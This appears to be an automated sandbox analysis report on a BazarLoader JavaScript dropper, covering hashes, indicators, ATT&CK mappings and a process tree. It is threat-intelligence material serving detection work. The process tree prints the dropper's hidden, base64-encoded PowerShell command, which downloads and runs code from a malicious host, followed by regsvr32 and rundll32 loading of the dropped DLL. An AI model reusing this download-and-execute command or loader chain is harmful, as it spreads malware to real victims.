bazarloader | a3d502012d1cded2d5a936372a08073db9b85dd2323908f9d55d802c24e8aa20

General

Target

Stolen Images Evidence.js
Size

19KB
MD5

c62b322046bee6a5a86c4fecf5dee72e
SHA1

18a381be8472fcee623c18cb1bfcf938682bef7d
SHA256

edb86c44b69eb1071a138ec2fd99968a18d671ecbcc6cbd7babcde7a132c1e01
SHA512

2d19000408a61cbf744defb51fc8f0c64f11c74186cdc2f56317641e16fd7c794919ead08ce119c62ec966dcd5a2c62794845e53f4697e657394c9e90ac1f0dc

Score

10^/10

bazarloader dropper loader

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://bobersok.top/333g100/index.php

Signatures

Bazar Loader
Detected loader normally used to deploy BazarBackdoor malware.
loader dropper bazarloader

Bazar/Team9 Loader payload 2 IoCs

resource	yara_rule
behavioral2/memory/2888-141-0x0000000000720000-0x0000000000748000-memory.dmp	BazarLoaderVar6
behavioral2/memory/3472-145-0x00000185898F0000-0x0000018589918000-memory.dmp	BazarLoaderVar6

Blocklisted process makes network request 1 IoCs

flow	pid	Process
13	1432	powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
2888	regsvr32.exe
3472	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1432	powershell.exe
1432	powershell.exe
1432	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1432	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1816 wrote to memory of 4044	1816	wscript.exe	69
PID 1816 wrote to memory of 4044	1816	wscript.exe	69
PID 4044 wrote to memory of 1432	4044	cmd.exe	71
PID 4044 wrote to memory of 1432	4044	cmd.exe	71
PID 1432 wrote to memory of 2888	1432	powershell.exe	72
PID 1432 wrote to memory of 2888	1432	powershell.exe	72

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:1816
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4044
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBvAGIAZQByAHMAbwBrAC4AdABvAHAALwAzADMAMwBnADEAMAAwAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1432
  - - C:\Windows\System32\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\ZrQOBam.dat
      4⤵
      Loads dropped DLL
      PID:2888

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\ZrQOBam.dat,DllRegisterServer {0E26A7BA-3829-46D1-83AC-21349F83EC06}
1⤵
- Loads dropped DLL
PID:3472

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1432-122-0x000002A527050000-0x000002A527051000-memory.dmp

Filesize
4KB

Download
memory/1432-132-0x000002A525200000-0x000002A525202000-memory.dmp

Filesize
8KB

Download
memory/1432-120-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-121-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-123-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-125-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-126-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-127-0x000002A53FAD0000-0x000002A53FAD1000-memory.dmp

Filesize
4KB

Download
memory/1432-128-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-133-0x000002A525203000-0x000002A525205000-memory.dmp

Filesize
8KB

Download
memory/1432-119-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-138-0x000002A525206000-0x000002A525208000-memory.dmp

Filesize
8KB

Download
memory/1432-135-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-118-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/1432-117-0x000002A525060000-0x000002A525062000-memory.dmp

Filesize
8KB

Download
memory/2888-140-0x0000000000750000-0x0000000000752000-memory.dmp

Filesize
8KB

Download
memory/2888-139-0x0000000000750000-0x0000000000752000-memory.dmp

Filesize
8KB

Download
memory/2888-141-0x0000000000720000-0x0000000000748000-memory.dmp

Filesize
160KB

Download
memory/3472-144-0x0000018588120000-0x0000018588122000-memory.dmp

Filesize
8KB

Download
memory/3472-143-0x0000018588120000-0x0000018588122000-memory.dmp

Filesize
8KB

Download
memory/3472-145-0x00000185898F0000-0x0000018589918000-memory.dmp

Filesize
160KB

Download

Analysis

Sharing